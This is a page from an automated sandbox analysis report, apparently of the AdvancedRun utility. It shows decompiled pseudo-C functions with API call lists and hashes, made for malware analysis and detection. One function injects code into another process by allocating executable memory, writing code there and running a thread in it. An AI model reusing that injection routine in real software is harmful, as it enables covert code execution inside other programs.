Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

0x0040a474
0x0040a47b
0x0040a48a
0x0040a48d
0x0040a48f
0x0040a497
0x0040a49a
0x0040a6f7
0x0040a6f9
0x0040a700
0x0040a700
0x0040a4ad
0x0040a4b3
0x0040a4b8
0x0040a4c6
0x0040a4cc
0x0040a4cf
0x0040a4dd
0x0040a4e2
0x0040a4e3
0x0040a4ea
0x0040a4e5
0x0040a4e5
0x0040a4e5
0x0040a4ec
0x0040a4f6
0x0040a4fe
0x0040a503
0x0040a504
0x0040a50b
0x0040a506
0x0040a506
0x0040a506
0x0040a50d
0x0040a512
0x0040a518
0x0040a51c
0x0040a523
0x0040a523
0x0040a523
0x0040a528
0x0040a537
0x0040a54c
0x0040a539
0x0040a544
0x0040a549
0x0040a558
0x0040a56d
0x0040a55a
0x0040a565
0x0040a56a
0x0040a579
0x0040a591
0x0040a57b
0x0040a589
0x0040a58e
0x0040a5b4
0x0040a5b7
0x0040a5cc
0x0040a5cf
0x0040a5d4
0x0040a5d7
0x0040a6ed
0x0040a5e5
0x0040a5fa
0x0040a60b
0x0040a61a
0x0040a620
0x0040a623
0x0040a62b
0x0040a62f
0x0040a632
0x0040a659
0x0040a634
0x0040a635
0x0040a641
0x0040a648
0x0040a648
0x0040a668
0x0040a66e
0x0040a685
0x0040a69e
0x0040a6a8
0x0040a6ad
0x0040a6bd
0x0040a6c5
0x0040a6c8
0x0040a6d0
0x0040a6d1
0x0040a6d2
0x0040a6d3
0x0040a6d3
0x0040a6c8
0x0040a6d7
0x0040a6dc
0x0040a6dc
0x0040a6d7
0x00000000

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
memset.MSVCRT ref: 0040A4B3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0

Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1

GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
CloseHandle.KERNEL32(00000000), ref: 0040A648
memset.MSVCRT ref: 0040A66E
ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
FreeLibrary.KERNEL32(?), ref: 0040A6DC
GetLastError.KERNEL32 ref: 0040A6E4
GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1

Strings

GetLastError, xrefs: 0040A4FE
kernel32.dll, xrefs: 0040A4BB
CreateProcessW, xrefs: 0040A4DD
D, xrefs: 0040A528

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
String ID: CreateProcessW$D$GetLastError$kernel32.dll
API String ID: 1572607441-20550370
Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

0x00401093
0x00401096
0x00401097
0x0040109b
0x004010a3
0x004010a5
0x00401270
0x00401278
0x004012b3
0x0040127a
0x00401293
0x004012a2
0x004012a2
0x004012c1
0x004012d9
0x004012ea
0x004012ec
0x004012f6
0x00000000
0x004010ab
0x004010ab
0x004010ac
0x00401231
0x00401236
0x00401239
0x0040123d
0x00401249
0x00401249
0x0040124c
0x00000000
0x00401252
0x00401259
0x00401265
0x00000000
0x00401265
0x0040123f
0x0040123f
0x00401243
0x00000000
0x00000000
0x00000000
0x00000000
0x00401243
0x004010b2
0x004010b2
0x004010b5
0x004011e1
0x004011e3
0x004011e6
0x0040120e
0x00401216
0x00000000
0x0040121c
0x00401224
0x00401226
0x00401229
0x00000000
0x0040122f
0x00000000
0x0040122f
0x00401229
0x004011e8
0x004011e8
0x004011ed
0x004011fb
0x00401203
0x00401203
0x004010bb
0x004010bb
0x004010c0
0x00401151
0x0040115a
0x00401168
0x0040116b
0x0040116e
0x00401170
0x00401173
0x00401180
0x00401182
0x00401185
0x004011a4
0x004011ac
0x00000000
0x004011b2
0x004011ba
0x004011bc
0x004011c7
0x004011c9
0x004011cb
0x00000000
0x004011d1
0x00000000
0x004011d1
0x004011cb
0x00401187
0x00401187
0x00401199
0x00000000
0x00401199
0x004010c6
0x004010c8
0x004012fd
0x004012fd
0x004012fd
0x004010ce
0x004010ce
0x004010d7
0x004010e5
0x004010e8
0x004010eb
0x004010ed
0x004010f0
0x00401102
0x0040111d
0x00401125
0x00000000
0x0040112b
0x00401133
0x00401135
0x00401140
0x00401142
0x00401144
0x00000000
0x0040114a
0x0040114a
0x00000000
0x0040114a
0x00401144
0x00401104
0x0040110a
0x0040110b
0x0040110b
0x0040110e
0x00401115
0x00401117
0x00401117
0x00401102
0x004010c8
0x004010c0
0x004010b5
0x004010ac
0x00401303

APIs

GetDlgItem.USER32 ref: 004010EB
ChildWindowFromPoint.USER32 ref: 004010FD
GetDlgItem.USER32 ref: 00401133
ChildWindowFromPoint.USER32 ref: 00401140
GetDlgItem.USER32 ref: 0040116E
ChildWindowFromPoint.USER32 ref: 00401180
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401189
LoadCursorW.USER32(00000000,00000067), ref: 00401192
SetCursor.USER32(00000000,?,?), ref: 00401199
GetDlgItem.USER32 ref: 004011BA
ChildWindowFromPoint.USER32 ref: 004011C7
GetDlgItem.USER32 ref: 004011E1
SetBkMode.GDI32(?,00000001), ref: 004011ED
SetTextColor.GDI32(?,00C00000), ref: 004011FB
GetSysColorBrush.USER32(0000000F), ref: 00401203
GetDlgItem.USER32 ref: 00401224
EndDialog.USER32(?,?), ref: 00401259
DeleteObject.GDI32(?), ref: 00401265
GetDlgItem.USER32 ref: 0040128A
ShowWindow.USER32(00000000), ref: 00401293
GetDlgItem.USER32 ref: 0040129F
ShowWindow.USER32(00000000), ref: 004012A2
SetDlgItemTextW.USER32 ref: 004012B3
SetWindowTextW.USER32(?,AdvancedRun), ref: 004012C1
SetDlgItemTextW.USER32 ref: 004012D9
SetDlgItemTextW.USER32 ref: 004012EA

Strings

AdvancedRun, xrefs: 004012B9

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: AdvancedRun
API String ID: 829165378-481304740
Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

0x00408ae3
0x00408aeb
0x00408af3
0x00408b76
0x00408b8a
0x00408b91
0x00408b98
0x00408bb1
0x00408bb3
0x00408bc6
0x00408bcc
0x00408bda
0x00408be0
0x00408bf3
0x00408bfa
0x00408c0b
0x00408c12
0x00408c17
0x00408c1a
0x00408c2c
0x00408c39
0x00408c3d
0x00408c3f
0x00408c41
0x00408c52
0x00408c58
0x00408c58
0x00408c6f
0x00408c71
0x00408c73
0x00408c83
0x00408c89
0x00408c89
0x00408c8a
0x00408c8f
0x00408c91
0x00408c9a
0x00408c93
0x00408c93
0x00408c93
0x00408c9f
0x00408ca5
0x00408caf
0x00408cbc
0x00408cc2
0x00408cc7
0x00408ccd
0x00408cd0
0x00408cd6
0x00408cd7
0x00408cd8
0x00408cde
0x00408ce3
0x00408ceb
0x00408cfe
0x00408d03
0x00408d06
0x00408d0c
0x00408d21
0x00408d27
0x00408d0c
0x00000000
0x00408ca7
0x00408ca7
0x00408cad
0x00408d28
0x00408d2e
0x00408d35
0x00408d36
0x00408d42
0x00408d48
0x00408d4e
0x00408d54
0x00408d5a
0x00408d60
0x00408d66
0x00408d6c
0x00408d72
0x00408d73
0x00408d7f
0x00408d85
0x00408d8a
0x00408d8f
0x00408d90
0x00408da8
0x00408db9
0x00408dbf
0x00408dc5
0x00408dc5
0x00000000
0x00408cad
0x00408ca5
0x00408af6
0x00408afc
0x00408b07
0x00408b2a
0x00408b38
0x00408b53
0x00408b56
0x00408b62
0x00408b6a
0x00408b6a
0x00408b2a
0x00408b07
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00408B20
GetDlgItem.USER32 ref: 00408B38
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00408B56
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00408B62
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00408B6A
memset.MSVCRT ref: 00408B91
memset.MSVCRT ref: 00408BB3
memset.MSVCRT ref: 00408BCC
memset.MSVCRT ref: 00408BE0
memset.MSVCRT ref: 00408BFA
memset.MSVCRT ref: 00408C12
GetCurrentProcess.KERNEL32 ref: 00408C1A
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00408C3D
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00408C6F
memset.MSVCRT ref: 00408CC2
GetCurrentProcessId.KERNEL32 ref: 00408CD0
memcpy.MSVCRT ref: 00408CFE
wcscpy.MSVCRT ref: 00408D21
_snwprintf.MSVCRT ref: 00408D90
SetDlgItemTextW.USER32 ref: 00408DA8
GetDlgItem.USER32 ref: 00408DB2
SetFocus.USER32(00000000), ref: 00408DB9

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
{Unknown}, xrefs: 00408BA5

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

0x0040b04d
0x0040b05e
0x0040b060
0x0040b063
0x0040b06a
0x0040b06d
0x0040b076
0x0040b07b
0x0040b07e
0x0040b084
0x0040b08e
0x0040b0a8
0x0040b0aa
0x0040b0ad
0x0040b0b0
0x0040b0b3
0x0040b0b6
0x0040b0b8
0x0040b0bb
0x0040b0be
0x0040b0c1
0x0040b0c4
0x0040b0c7
0x0040b0ca
0x0040b0cd
0x0040b0cd
0x0040b0e5
0x0040b11f
0x0040b128
0x0040b0e7
0x0040b0e7
